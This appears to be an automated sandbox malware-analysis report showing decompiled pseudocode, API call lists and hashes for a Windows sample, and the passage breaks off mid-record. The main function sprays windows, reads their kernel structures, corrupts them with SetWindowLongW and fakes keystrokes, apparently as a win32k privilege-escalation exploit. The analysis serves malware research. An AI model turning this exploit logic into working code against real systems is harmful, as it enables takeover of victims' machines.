                      0x0093d85e

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: TextWindowlstrlen$_memset
                      • String ID:
                      • API String ID: 2993350514-0
                      • Opcode ID: d8a2fb2aa16799cd0dc75827ec5951c57dd2043ee17740eb811c4c3a430f2912
                      • Instruction ID: 3bb77a7ece29cb74d0f1637e18d13cccaf0be62cea509768ddd51f90edb03fc4
                      • Opcode Fuzzy Hash: d8a2fb2aa16799cd0dc75827ec5951c57dd2043ee17740eb811c4c3a430f2912
                      • Instruction Fuzzy Hash: 68518075A242589FCB15CF78EC90AAE73FDFB48310F1446AAE50DE7290DA309E459F50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093D23C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 73%
                      			E0093D23C(intOrPtr __edx) {
				struct HWND__* _t82;
				signed int _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				struct HWND__* _t90;
				intOrPtr _t92;
				intOrPtr _t101;
				intOrPtr _t103;
				intOrPtr _t144;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr _t149;
				void* _t150;
				intOrPtr _t151;
				void* _t153;
				intOrPtr _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				struct HWND__* _t167;
				void* _t168;
				signed int _t171;
				intOrPtr _t176;
				int _t177;
				void* _t178;
				signed int _t179;
				signed int _t180;
				struct _SECURITY_ATTRIBUTES* _t181;
				signed int _t185;
				void* _t203;
				void* _t205;

				_t165 = __edx;
				 *(_t185 - 4) = 0xfffffffe;
				_t167 =  *(_t185 - 0xbf4);
				_t149 =  *((intOrPtr*)(_t185 - 0xbf8));
				_t176 =  *((intOrPtr*)(_t185 - 0xbf0)) + 1;
				while(1) {
					 *((intOrPtr*)(_t185 - 0xbf0)) = _t176;
					if(_t176 >= 0xa) {
						break;
					}
					 *(_t185 - 4) = 0;
					_push(0xdddddddd);
					_push(0xcccccccc);
					_push(0xfffffff4);
					_push(_t167);
					_t144 =  *0x9441ec; // 0x1471
					_push(_t144 - _t176);
					L009310C5();
					if( *((intOrPtr*)(_t149 + 0xc0)) == 0) {
						 *(_t185 - 4) = 0xfffffffe;
						_t176 = _t176 + 1;
						continue;
					}
					_t147 =  *0x9441ec; // 0x1471
					_t148 = _t147 - _t176;
					 *0x9441ec = _t148;
					_t177 = 1;
					 *(_t185 - 0xbfc) = 1;
					if(_t148 == 0x1471) {
						 *0x958070 =  *0x958070 - 8;
					}
					 *(_t185 - 4) = 0xfffffffe;
					L8:
					DestroyWindow(_t167);
					if(_t177 == 0 ||  *0x958060 == 0 ||  *0x958064 == 0) {
						L52:
						goto L53;
					} else {
						memset(_t185 - 0x7ec, 0x610061, 0x64 << 2);
						 *((short*)(_t185 - 0x1e)) = 0;
						 *(_t185 - 0xc38) = 0x30;
						 *((intOrPtr*)(_t185 - 0xc34)) = 0;
						 *((intOrPtr*)(_t185 - 0xc30)) = DefWindowProcW;
						 *(_t185 - 0xc2c) = 0;
						 *(_t185 - 0xc28) = 0;
						 *(_t185 - 0xc24) =  *0x9580b8;
						asm("xorps xmm0, xmm0");
						asm("movdqu [ebp-0xc20], xmm0");
						 *((intOrPtr*)(_t185 - 0xc10)) = L"MyExtraWnd";
						 *(_t185 - 0xc0c) = 0;
						if(RegisterClassExW(_t185 - 0xc38) == 0) {
							goto L52;
						}
						E00935A90(_t185 - 0xbec, 0, 0x400);
						_t171 = 0;
						while(1) {
							_t82 = CreateWindowExW(0, L"MyExtraWnd", _t185 - 0x7ec, 0, 0, 0, 0, 0, 0, 0,  *0x9580b8, 0);
							 *(_t185 + _t171 * 4 - 0xbec) = _t82;
							if(_t82 == 0) {
								break;
							}
							_t171 = _t171 + 1;
							if(_t171 < 0x100) {
								continue;
							}
							break;
						}
						_t83 = 0;
						 *(_t185 - 0xbf4) = 0;
						do {
							_t179 = 0;
							_t84 =  *((intOrPtr*)(_t185 + _t83 * 4 - 0xbec));
							 *((intOrPtr*)(_t185 - 0xbf0)) =  *((intOrPtr*)(_t185 + _t83 * 4 - 0xbec));
							while(1) {
								_t85 = E0093C750(_t84);
								_t151 =  *((intOrPtr*)(_t85 + 0x20));
								 *((intOrPtr*)(_t185 - 0xc08)) = _t151;
								 *((intOrPtr*)(_t185 - 0xc00)) =  *((intOrPtr*)(_t85 + 0x24));
								_t87 = E0093C750( *((intOrPtr*)(_t185 + _t179 * 4 - 0xbec)));
								_t160 =  *((intOrPtr*)(_t87 + 0x20));
								 *((intOrPtr*)(_t185 - 0xc04)) = _t160;
								_t165 =  *((intOrPtr*)(_t87 + 0x24));
								 *((intOrPtr*)(_t185 - 0xbf8)) = _t165;
								_t88 =  *((intOrPtr*)(_t185 - 0xc00));
								_t203 = _t88 - _t165;
								if(_t203 > 0 || _t203 >= 0 && _t151 >= _t160) {
									goto L23;
								}
								L20:
								_t165 = _t160 + 0x300;
								asm("adc ecx, 0x0");
								_t153 = _t151 + 0x40000;
								asm("adc eax, 0x0");
								_t205 = _t88 -  *((intOrPtr*)(_t185 - 0xbf8));
								if(_t205 > 0 || _t205 >= 0 && _t153 > _t165) {
									 *0x958080 =  *((intOrPtr*)(_t185 - 0xbf0));
									 *0x958090 =  *((intOrPtr*)(_t185 + _t179 * 4 - 0xbec));
									 *0x958084 = E0093C750( *((intOrPtr*)(_t185 - 0xbf0)));
									 *0x958094 = E0093C750( *((intOrPtr*)(_t185 + _t179 * 4 - 0xbec)));
									 *0x958088 =  *((intOrPtr*)(_t185 - 0xc08));
									 *0x95808c =  *((intOrPtr*)(_t185 - 0xc00));
									 *0x958098 =  *((intOrPtr*)(_t185 - 0xc04));
									 *0x95809c =  *((intOrPtr*)(_t185 - 0xbf8));
									_t163 =  *0x958084;
									 *0x9580a8 =  *((intOrPtr*)(_t163 + 0x10));
									 *0x9580ac =  *((intOrPtr*)(_t163 + 0x14));
									asm("adc ecx, 0x0");
									asm("adc ecx, 0xffffffff");
									 *0x9580a0 =  *0x958088 +  *0x958060 + 0xfffffff8;
									 *0x9580a4 =  *0x95808c;
									L26:
									if( *0x958080 == 0 ||  *0x958090 == 0) {
										break;
									} else {
										goto L29;
									}
								}
								L23:
								_t179 = _t179 + 1;
								if(_t179 > _t171) {
									goto L26;
								}
								_t84 =  *((intOrPtr*)(_t185 - 0xbf0));
								_t85 = E0093C750(_t84);
								_t151 =  *((intOrPtr*)(_t85 + 0x20));
								 *((intOrPtr*)(_t185 - 0xc08)) = _t151;
								 *((intOrPtr*)(_t185 - 0xc00)) =  *((intOrPtr*)(_t85 + 0x24));
								_t87 = E0093C750( *((intOrPtr*)(_t185 + _t179 * 4 - 0xbec)));
								_t160 =  *((intOrPtr*)(_t87 + 0x20));
								 *((intOrPtr*)(_t185 - 0xc04)) = _t160;
								_t165 =  *((intOrPtr*)(_t87 + 0x24));
								 *((intOrPtr*)(_t185 - 0xbf8)) = _t165;
								_t88 =  *((intOrPtr*)(_t185 - 0xc00));
								_t203 = _t88 - _t165;
								if(_t203 > 0 || _t203 >= 0 && _t151 >= _t160) {
									goto L23;
								}
							}
							_t83 =  &( *(_t185 - 0xbf4)->i);
							 *(_t185 - 0xbf4) = _t83;
						} while (_t83 <= _t171);
						L29:
						_t180 = 0;
						do {
							_t90 =  *(_t185 + _t180 * 4 - 0xbec);
							if(_t90 !=  *0x958080 && _t90 !=  *0x958090) {
								DestroyWindow(_t90);
							}
							_t180 = _t180 + 1;
						} while (_t180 < 0x100);
						if( *0x958080 == 0 ||  *0x958090 == 0) {
							goto L52;
						} else {
							if( *0x95807c != 0) {
								L51:
								L53:
								 *[fs:0x0] =  *((intOrPtr*)(_t185 - 0x10));
								_pop(_t168);
								_pop(_t178);
								_pop(_t150);
								return E0093161C(_t150,  *(_t185 - 0x1c) ^ _t185, _t165, _t168, _t178);
							}
							while(1) {
								_t92 =  *0x944244; // 0xa
								if( *0x9580bc >= _t92) {
									goto L51;
								}
								 *0x9580d4 = 0;
								 *0x9580d8 = 0;
								 *0x9580d0 = 0;
								if( *0x95807c != 0) {
									L50:
									 *0x9580bc =  *0x9580bc + 1;
									if( *0x95807c == 0) {
										continue;
									}
									goto L51;
								}
								_t181 = 0;
								 *0x9580c0 = CreateThread(0, 0, E0093C970, 0, 0, 0);
								while( *0x9580d0 == 0) {
									_t181 =  &(_t181->nLength);
									Sleep(0x32);
									if(_t181 < 0x14) {
										continue;
									}
									break;
								}
								if(_t181 >= 0x14) {
									DestroyWindow( *0x9580d4);
									DestroyWindow( *0x9580d8);
									TerminateThread( *0x9580c0, 0xffffffff);
								} else {
									_t101 =  *0x94424c; // 0x1388
									_t103 =  *0x944248; // 0x1388
									 *0x9580d8 = CreateWindowExW(0x80000, L"MyMainWnd", 0, 0x10000000, _t103 + 1, _t101 + 1, 1, 1, 0, 0,  *0x9580b8, 0);
									if( *0x9580d8 != 0) {
										asm("adc edi, 0x0");
										asm("adc edi, 0x0");
										asm("adc edi, 0xffffffff");
										SetWindowLongW( *0x9580d8, 0xfffffff0, GetWindowLongW( *0x9580d8, 0xfffffff0) | 0x40000000);
										_push( *0x95808c);
										_push( *0x958088 +  *0x958064 + 3 - 0x28);
										_push(0xfffffff4);
										_push( *0x9580d8);
										_push( *0x9441ec);
										L009310C5();
										keybd_event(0x12, 0, 0, 0);
										keybd_event(0x1b, 0, 0, 0);
										keybd_event(0x1b, 0, 2, 0);
										keybd_event(0x12, 0, 2, 0);
										Sleep(0x64);
									}
									DestroyWindow( *0x9580d4);
									DestroyWindow( *0x9580d8);
									TerminateThread( *0x9580c0, 0xffffffff);
									WaitForSingleObject( *0x9580c0, 0xffffffff);
									if( *0x95807c == 0 &&  *((intOrPtr*)( *0x958084 +  *0x958064)) >= 0x4000000) {
										 *0x95807c = E0093C820();
									}
								}
								goto L50;
							}
							goto L51;
						}
					}
				}
				_t177 =  *(_t185 - 0xbfc);
				goto L8;
			}


































                      0x0093d23c
                      0x0093d23f
                      0x0093d246
                      0x0093d24c
                      0x0093d258
                      0x0093d1c5
                      0x0093d1c5
                      0x0093d1ce
                      0x00000000
                      0x00000000
                      0x0093d1d4
                      0x0093d1db
                      0x0093d1e0
                      0x0093d1e5
                      0x0093d1e7
                      0x0093d1e8
                      0x0093d1ef
                      0x0093d1f0
                      0x0093d1fc
                      0x0093d22c
                      0x0093d233
                      0x00000000
                      0x0093d233
                      0x0093d1fe
                      0x0093d203
                      0x0093d205
                      0x0093d20a
                      0x0093d20f
                      0x0093d21a
                      0x0093d21c
                      0x0093d21c
                      0x0093d223
                      0x0093d271
                      0x0093d272
                      0x0093d27a
                      0x0093d71c
                      0x00000000
                      0x0093d29a
                      0x0093d2aa
                      0x0093d2ae
                      0x0093d2b2
                      0x0093d2bc
                      0x0093d2c7
                      0x0093d2cd
                      0x0093d2d7
                      0x0093d2e6
                      0x0093d2ec
                      0x0093d2ef
                      0x0093d2f7
                      0x0093d301
                      0x0093d31b
                      0x00000000
                      0x00000000
                      0x0093d32f
                      0x0093d337
                      0x0093d340
                      0x0093d364
                      0x0093d36a
                      0x0093d373
                      0x00000000
                      0x00000000
                      0x0093d375
                      0x0093d37c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093d37c
                      0x0093d37e
                      0x0093d380
                      0x0093d390
                      0x0093d390
                      0x0093d392
                      0x0093d399
                      0x0093d3a0
                      0x0093d3a1
                      0x0093d3a6
                      0x0093d3a9
                      0x0093d3b2
                      0x0093d3bf
                      0x0093d3c4
                      0x0093d3c7
                      0x0093d3cd
                      0x0093d3d0
                      0x0093d3d6
                      0x0093d3dc
                      0x0093d3de
                      0x00000000
                      0x00000000
                      0x0093d3e6
                      0x0093d3e8
                      0x0093d3f4
                      0x0093d3f7
                      0x0093d3fd
                      0x0093d400
                      0x0093d402
                      0x0093d421
                      0x0093d42d
                      0x0093d439
                      0x0093d444
                      0x0093d44f
                      0x0093d45a
                      0x0093d465
                      0x0093d470
                      0x0093d475
                      0x0093d47e
                      0x0093d486
                      0x0093d49c
                      0x0093d4a2
                      0x0093d4a5
                      0x0093d4aa
                      0x0093d4b0
                      0x0093d4b7
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093d4b7
                      0x0093d40a
                      0x0093d40a
                      0x0093d40d
                      0x00000000
                      0x00000000
                      0x0093d413
                      0x0093d3a1
                      0x0093d3a6
                      0x0093d3a9
                      0x0093d3b2
                      0x0093d3bf
                      0x0093d3c4
                      0x0093d3c7
                      0x0093d3cd
                      0x0093d3d0
                      0x0093d3d6
                      0x0093d3dc
                      0x0093d3de
                      0x00000000
                      0x00000000
                      0x0093d3de
                      0x0093d4c8
                      0x0093d4c9
                      0x0093d4cf
                      0x0093d4d7
                      0x0093d4d7
                      0x0093d4e0
                      0x0093d4e0
                      0x0093d4f3
                      0x0093d4fe
                      0x0093d4fe
                      0x0093d500
                      0x0093d501
                      0x0093d510
                      0x00000000
                      0x0093d523
                      0x0093d52a
                      0x0093d70e
                      0x0093d71e
                      0x0093d721
                      0x0093d729
                      0x0093d72a
                      0x0093d72b
                      0x0093d739
                      0x0093d739
                      0x0093d540
                      0x0093d540
                      0x0093d54b
                      0x00000000
                      0x00000000
                      0x0093d551
                      0x0093d55b
                      0x0093d565
                      0x0093d576
                      0x0093d6fb
                      0x0093d6fb
                      0x0093d708
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093d708
                      0x0093d57c
                      0x0093d58e
                      0x0093d593
                      0x0093d59c
                      0x0093d59f
                      0x0093d5a4
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093d5a4
                      0x0093d5a9
                      0x0093d6e3
                      0x0093d6eb
                      0x0093d6f5
                      0x0093d5af
                      0x0093d5bf
                      0x0093d5c6
                      0x0093d5e4
                      0x0093d5f0
                      0x0093d607
                      0x0093d60d
                      0x0093d616
                      0x0093d635
                      0x0093d63b
                      0x0093d63c
                      0x0093d63d
                      0x0093d644
                      0x0093d645
                      0x0093d64b
                      0x0093d65e
                      0x0093d668
                      0x0093d672
                      0x0093d67c
                      0x0093d680
                      0x0093d682
                      0x0093d68e
                      0x0093d696
                      0x0093d6a0
                      0x0093d6ae
                      0x0093d6bb
                      0x0093d6d6
                      0x0093d6d6
                      0x0093d6bb
                      0x00000000
                      0x0093d5a9
                      0x00000000
                      0x0093d540
                      0x0093d510
                      0x0093d27a
                      0x0093d25e
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$ClassCreateDestroyRegister_memset
                      • String ID: 0$MyExtraWnd
                      • API String ID: 1202089904-2557349926
                      • Opcode ID: 55d13bfbd1b3ce77648fd224a4d08d56906817319b1023e615bc7aa8d9573179
                      • Instruction ID: a8a16464dd274189160ad2c12ede99c90be7cc85da6ea8b386bb9168aa5734fa
                      • Opcode Fuzzy Hash: 55d13bfbd1b3ce77648fd224a4d08d56906817319b1023e615bc7aa8d9573179
                      • Instruction Fuzzy Hash: F95170B4D153298BEB20CF68EC54BEEB7B8BB49304F1442E5E419A7290DB745E85CF41
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00931CAC Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                      Download Yara Rule
                      C-Code - Quality: 91%
                      			E00931CAC(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E00931E5B(_t3);
				if(E009334FF() != 0) {
					_t6 = E00933010(E00931A3D);
					 *0x943000 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E00933585(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E00931D22();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E0093306C( *0x943000, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00931BF9(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00931D22();
					return 0;
				}
			}








                      0x00931cac
                      0x00931cb8
                      0x00931cc7
                      0x00931ccc
                      0x00931cd2
                      0x00931cd5
                      0x00000000
                      0x00931cd7
                      0x00931ce4
                      0x00931ce8
                      0x00931cea
                      0x00931d19
                      0x00931d19
                      0x00931d1e
                      0x00931d21
                      0x00931cec
                      0x00931cfa
                      0x00931cfc
                      0x00000000
                      0x00931cfe
                      0x00931cfe
                      0x00931d00
                      0x00931d01
                      0x00931d08
                      0x00931d0e
                      0x00931d12
                      0x00931d16
                      0x00931d18
                      0x00931d18
                      0x00931cfc
                      0x00931cea
                      0x00931cba
                      0x00931cba
                      0x00931cba
                      0x00931cc1
                      0x00931cc1

                      APIs
                      • __init_pointers.LIBCMT ref: 00931CAC
                        • Part of subcall function 00931E5B: RtlEncodePointer.NTDLL(00000000,?,00931CB1,00931509,00941E70,00000014), ref: 00931E5E
                        • Part of subcall function 00931E5B: __initp_misc_winsig.LIBCMT ref: 00931E79
                        • Part of subcall function 00931E5B: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00933103
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00933117
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0093312A
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0093313D
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00933150
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00933163
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00933176
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00933189
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0093319C
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 009331AF
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 009331C2
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 009331D5
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 009331E8
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 009331FB
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0093320E
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00933221
                      • __mtinitlocks.LIBCMT ref: 00931CB1
                      • __mtterm.LIBCMT ref: 00931CBA
                        • Part of subcall function 00931D22: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00931CBF,00931509,00941E70,00000014), ref: 00933419
                        • Part of subcall function 00931D22: _free.LIBCMT ref: 00933420
                        • Part of subcall function 00931D22: DeleteCriticalSection.KERNEL32(00943068,?,?,00931CBF,00931509,00941E70,00000014), ref: 00933442
                      • __calloc_crt.LIBCMT ref: 00931CDF
                      • __initptd.LIBCMT ref: 00931D01
                      • GetCurrentThreadId.KERNEL32 ref: 00931D08
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                      • String ID:
                      • API String ID: 3567560977-0
                      • Opcode ID: 948851e8e09014f6185ba5913ffc412b540aa849da5d95d2e66fb29414563a86
                      • Instruction ID: 479f583cc49e48c8524163ef838867f323fdbd6ff3df8c80b077eba20de54e58
                      • Opcode Fuzzy Hash: 948851e8e09014f6185ba5913ffc412b540aa849da5d95d2e66fb29414563a86
                      • Instruction Fuzzy Hash: A0F0B43659971119E2387B747C03B5B2A99DF82734F208B29F4A5C50F2FF11C9425D94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093BFE0 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0093BFE0(struct HWND__* _a4) {
				int _v8;
				void _v12;
				struct HWND__* _t12;
				int _t16;
				int _t18;
				int _t22;
				struct HWND__* _t24;

				_t12 = GetForegroundWindow();
				_t24 = _a4;
				if(_t12 == _t24) {
					return _t12;
				}
				_t22 = 0;
				_v12 = 8;
				_v8 = 0;
				if(SystemParametersInfoW(0x48, 8,  &_v12, 0) != 0) {
					_t18 = _v8;
					if(_t18 != 0) {
						_t22 = _t18;
						_v12 = 8;
						_v8 = 0;
						SystemParametersInfoW(0x49, 8,  &_v12, 0);
					}
				}
				SendMessageW(_t24, 0x112, 0xf020, 0);
				_t16 = SendMessageW(_t24, 0x112, 0xf120, 0);
				if(_t22 != 0) {
					_v12 = 8;
					_v8 = _t22;
					_t16 = SystemParametersInfoW(0x49, 8,  &_v12, 0);
				}
				return _t16;
			}










                      0x0093bfe7
                      0x0093bfed
                      0x0093bff2
                      0x0093c086
                      0x0093c086
                      0x0093c003
                      0x0093c005
                      0x0093c012
                      0x0093c019
                      0x0093c01b
                      0x0093c020
                      0x0093c024
                      0x0093c026
                      0x0093c030
                      0x0093c03c
                      0x0093c03c
                      0x0093c020
                      0x0093c051
                      0x0093c060
                      0x0093c064
                      0x0093c06b
                      0x0093c077
                      0x0093c07a
                      0x0093c07a
                      0x00000000

                      APIs
                      • GetForegroundWindow.USER32(?,?), ref: 0093BFE7
                      • SystemParametersInfoW.USER32 ref: 0093C015
                      • SystemParametersInfoW.USER32 ref: 0093C03C
                      • SendMessageW.USER32(?,00000112,0000F020,00000000), ref: 0093C051
                      • SendMessageW.USER32(?,00000112,0000F120,00000000), ref: 0093C060
                      • SystemParametersInfoW.USER32 ref: 0093C07A
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoParametersSystem$MessageSend$ForegroundWindow
                      • String ID:
                      • API String ID: 4248574875-0
                      • Opcode ID: 26eeccbaf94b40852a01f4c25d5f8411bf12e7961c7243a60660232832bbd64c
                      • Instruction ID: 5ff825a6173eb9df330bb2eba84eab8f2420f4487644ff256396f74c873512fb
                      • Opcode Fuzzy Hash: 26eeccbaf94b40852a01f4c25d5f8411bf12e7961c7243a60660232832bbd64c
                      • Instruction Fuzzy Hash: 0D1133B0A84308BAFB208B949D86FAE7BBCEB04B55F504165FA44BA1C0C7F46D459B50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093CFD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0093CFD0() {
				struct HWND__* _t10;
				void* _t12;
				int _t15;

				_t15 = 0;
				_t10 = CreateWindowExW(0, 0x8002, 0, 0, 0, 0, 0, 0, 0, 0,  *0x9580b8, 0);
				if(_t10 == 0) {
					L8:
					return _t15;
				} else {
					_t12 = E0093C750(_t10);
					if(_t12 == 0) {
						L7:
						DestroyWindow(_t10);
						goto L8;
					} else {
						SetWindowLongW(_t10, 0, 0x31323334);
						while( *((intOrPtr*)(_t15 + _t12)) != 0x31323334) {
							_t15 = _t15 + 1;
							if(_t15 < 0x200) {
								continue;
							} else {
								DestroyWindow(_t10);
								return 0;
							}
							goto L9;
						}
						_t15 = _t15 + 8;
						goto L7;
					}
				}
				L9:
			}






                      0x0093cfd7
                      0x0093cfef
                      0x0093cff3
                      0x0093d03c
                      0x0093d040
                      0x0093cff5
                      0x0093cffc
                      0x0093d000
                      0x0093d034
                      0x0093d035
                      0x00000000
                      0x0093d002
                      0x0093d009
                      0x0093d010
                      0x0093d019
                      0x0093d020
                      0x00000000
                      0x0093d022
                      0x0093d025
                      0x0093d030
                      0x0093d030
                      0x00000000
                      0x0093d020
                      0x0093d031
                      0x00000000
                      0x0093d031
                      0x0093d000
                      0x00000000

                      APIs
                      • CreateWindowExW.USER32 ref: 0093CFE9
                      • SetWindowLongW.USER32 ref: 0093D009
                      • DestroyWindow.USER32(00000000,?,00000000), ref: 0093D025
                      • DestroyWindow.USER32(00000000,00000000,74656490,?,00000000), ref: 0093D035
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$Destroy$CreateLong
                      • String ID: 4321
                      • API String ID: 4054532065-3297689448
                      • Opcode ID: c9523dda6824ec4036d905db8e5026e28b1662a4f388ada07bfa10bdfa5b0510
                      • Instruction ID: 9685d5de4d4e4132c2bf126e5d584d83868639af6b25417432d5c34b13e166cf
